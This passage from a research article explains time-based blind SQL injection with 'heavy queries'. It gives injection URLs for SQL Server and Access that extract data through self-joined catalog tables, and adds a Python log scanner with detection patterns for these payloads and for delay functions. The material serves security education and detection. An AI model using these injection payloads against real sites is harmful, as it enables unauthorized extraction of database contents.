Time-based blind SQL injection technique using heavy queries
And then we start with the second letter:
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers AS sys2, sysusers AS sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 150 >(select top 1 ascii(substring(name,1,1)) from sysusers)
Example 2: Microsoft Access. Using the MSysAccessObjects table.
http://www.informatica64.com/retohacking/pista.aspx?id_pista=1 and (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7, MSysAccessObjects AS T8, MSysAccessObjects AS T9, MSysAccessObjects AS T10)>0 and exists (select * from contrasena)
In this example you see a heavy query for Microsoft Access databases with a delay of six seconds. An attacker can extract all information using the same method shown in the Microsoft SQL Server example, using this heavy query as a second condition in the "where" clause to delay the response.
Conclusions
Taking into consideration the methods described above, we can see that on Microsoft SQL Server and Oracle, access to stored procedures is needed to generate time delays, through calls to the Wait-for methods and to DBMS_LOCK respectively. This is not necessary on MySQL engines, because there a mathematical function is used to generate the time delay. Some Intrusion Detection Systems (IDS) and firewall applications are able to block URLs that use Benchmark functions.
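As an added defensive example (not part of the original article), the following Python scanner applies the detection idea from the conclusions to web-server access logs: it flags requests whose query string self-joins a database catalog table several times, as the Microsoft SQL Server and Access examples above do, or calls an explicit delay primitive. The log lines, client addresses and the Oracle/MySQL catalog table names are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Catalog tables the heavy-query technique self-joins. sysusers (SQL Server) and
# MSysAccessObjects (Access) come from the article; the rest are assumed equivalents.
CATALOG_TABLES = ("sysusers", "sysobjects", "syscolumns", "msysaccessobjects",
                  "msysobjects", "all_users", "all_objects")
SELF_JOIN_THRESHOLD = 3   # a normal query rarely names one catalog table 3+ times
# Explicit delay primitives named in the conclusions (MySQL, SQL Server, Oracle).
DELAY_PATTERNS = {
    "benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "waitfor":   re.compile(r"\bwaitfor\s+delay\b", re.I),
    "dbms_lock": re.compile(r"\bdbms_lock\.sleep\b", re.I),
}
TABLE_RE = re.compile(r"\b(" + "|".join(CATALOG_TABLES) + r")\b", re.I)

def heavy_query_indicators(raw_url):
    """Return the time-delay indicators found in one request URL (empty if none)."""
    query = unquote_plus(raw_url)        # undo %20 / '+' encoding before matching
    found = []
    refs = Counter(t.lower() for t in TABLE_RE.findall(query))
    for table, n in refs.items():
        if n >= SELF_JOIN_THRESHOLD:
            found.append(f"self-join:{table}x{n}")
    for name, pat in DELAY_PATTERNS.items():
        if pat.search(query):
            found.append(name)
    return found

LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) ')
def scan_access_log(lines):
    """Return (client_ip, url, indicators) for every request that looks like a heavy query."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ip, url = m.groups()
            indicators = heavy_query_indicators(url)
            if indicators:
                hits.append((ip, url, indicators))
    return hits

# Constructed sample access-log lines (not real traffic); the injected strings follow the article's examples.
SAMPLE_LOG = [
    '10.0.0.7 - - [01/Jan/2008:10:00:00 +0000] "GET /pista.aspx?id_pista=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2008:10:00:05 +0000] "GET /pista.aspx?id_pista=1%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,%20sysusers%20AS%20sys2,%20sysusers%20AS%20sys3,%20sysusers%20AS%20sys4)>1%20and%20150>(select%20top%201%20ascii(substring(name,1,1))%20from%20sysusers) HTTP/1.1" 200 512',
    '10.0.0.12 - - [01/Jan/2008:10:00:11 +0000] "GET /pista.aspx?id_pista=1+and+(SELECT+count(*)+FROM+MSysAccessObjects+AS+T1,+MSysAccessObjects+AS+T2,+MSysAccessObjects+AS+T3)>0+and+exists+(select+*+from+contrasena) HTTP/1.1" 200 512',
    '10.0.0.15 - - [01/Jan/2008:10:00:20 +0000] "GET /pista.aspx?id_pista=1%20and%20benchmark(5000000,md5(%27a%27)) HTTP/1.1" 200 512',
]
```

Pairing these indicators with the per-request response time from the same log (the six-second delay described above) separates heavy-query probing from ordinary slow pages.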
Authors
The information presented here is extracted from the PhD thesis that Chema Alonso (Microsoft Windows Security MVP, Systems Engineer, Rey Juan Carlos University) is currently working on under the direction of Dr. Antonio Guzmán (Systems Engineering Doctor, Rey Juan Carlos University) and Dr. Marta Beltrán (Systems Engineering Doctor, Rey Juan Carlos University).
Mr. Daniel Kachakil (Systems Engineer and Master in Software Engineering, Polytechnic University of Valencia) and Mr. Rodolfo Bordón (System Security Consultant and Software Specialist Technician) also contributed to this article by assisting with response-time tests in different environments.